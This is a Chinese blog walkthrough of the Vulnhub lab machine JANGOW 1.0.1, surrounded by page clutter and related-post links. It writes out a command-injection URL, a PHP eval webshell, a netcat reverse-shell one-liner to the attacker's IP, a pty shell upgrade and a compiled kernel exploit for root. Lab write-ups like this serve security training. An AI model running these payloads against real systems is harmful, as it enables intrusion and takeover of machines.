【Vulnhub靶场】JANGOW: 1.0.1

已于 2022-07-27 15:08:53 修改
阅读量668 收藏 2
点赞数 1
分类专栏: 靶场实战 文章标签: 安全 web安全
于 2022-06-02 16:01:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53095382/article/details/125100180
版权

目录

前言

一、信息收集

0x00 环境介绍

0x01 nmap扫描

二、漏洞挖掘

0x00 命令执行漏洞利用

0x01 一句话木马利用

0x02 信息收集

三、权限提升

0x00 反弹shell

 flag

前言

Difficulty: easy

The secret to this box is enumeration!

下载链接:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent

一、信息收集

0x00 环境介绍

Jangow1.0.1靶机IP:192.168.56.118
kali攻击机IP:    192.168.56.102

 0x01 nmap扫描

查看开启端口和服务,

二、漏洞挖掘

通过访问靶机IP,寻找利用点

0x00 命令执行漏洞利用

进去site文件,发现功能点
http://192.168.56.118/site/busque.php?buscar=
尝试命令执行whoami
http://192.168.56.118/site/busque.php?buscar=whoami
发现是可以执行命令的
查看密码文件
cat/etc/passwd

0x01 一句话木马利用

可以根据命令执行漏洞写入一句话木马

写入一句话木马蚁剑连接
echo '<?php @eval ($_POST["123"]);?>' >>shell.php

 0x02 信息收集

在文件中寻找敏感信息,比如账号密码,为进一步渗透做铺垫。

 三、权限提升

0x00 反弹shell

蚁剑中只能查看部分文件,没有权限,所以可以做反弹shell进一步提权

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>

反弹成功

 升级shell,变成交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'

uname -a
获取版本号 

 
 

根据系统版本提权
searchsploit ubuntu 4.4.0

采用45010.c这个文件进行提权

蚁剑将该文件上传到靶机

下载链接
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip

gcc 45010.c -o exp //生成可执行文件

chmod +x exp //添加可执行权限

./exp   //执行exp文件

 

  进入root目录,查看文件。

 

 发现proof.txt文件,进行查看。

 flag

 MD5解密发现是空密码

Ch33syNai1a0
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1064
Vulnhub - JANGOW: 1.0.1 靶标实战
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1094
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2898
一次打靶记录。
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 612
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
Vulnhub - JANGOW: 1.0.1
最新发布
shuozhuqiu6452的博客
12-05 142
vulnhub - JANGOW: 1.0.1
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送jar包:geronimo-j2ee-management_1.1_spec-1.0.1.jar; 赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含...
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
vulnhub靶场Jangow: 1.0.1
nightwindnw的博客
01-09 272
闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow: 1.0.1做做,以此记录……
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1117
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3152
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
jangow靶机渗透
leoNULLdo的博客
12-05 1030
原理:在KALI上配置一条iptables规则,将到1-65535端口的流量全部重定向到4444端口,在KALI上监听4444端口,然后再从靶机上发起到1-65535的访问,如果到某个端口的流量未被拦截,那么到该端口的流量将成功转发到4444端口。(2)用户名:jangow01 密码:abygurl69,可登录ftp,ftp的版本信息为vsftpd3.0.3,在jangow01的家目录中找到了一个空flag,但是ftp的权限不允许上传文件。在蚁剑的虚拟终端中执行脚本:./b.sh,不行。
VulnHub-Jangow-01-1.0.1打靶记录
qq_43534481的博客
08-21 539
Vulnhub 靶场 jangow打靶记录
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5670
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
Vulnhub靶场Jangow靶机环境找不到ip解决方法。
m0_64376783的博客
04-14 730
删除etc得到了/ vim /etc 接着补全 vim /etc/network 回车看见网卡界面。先配置好,因为扫描的时候会扫不到ip 网络模式调节为桥接模式,然后开机,按e键,进入编辑模式输入。pwd 查看目录 cd init.d 进入目录,ls查看,看见networking。小小挫折,自己解决,那当然是不可能的。要进入vim /etc/network/interfaces 修改网卡。尝试关机重启,重启以后一直在加载,说明没有效果,方法行不通。ip a查看 网卡ens33 斜杠打不了,只能一步步进入。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值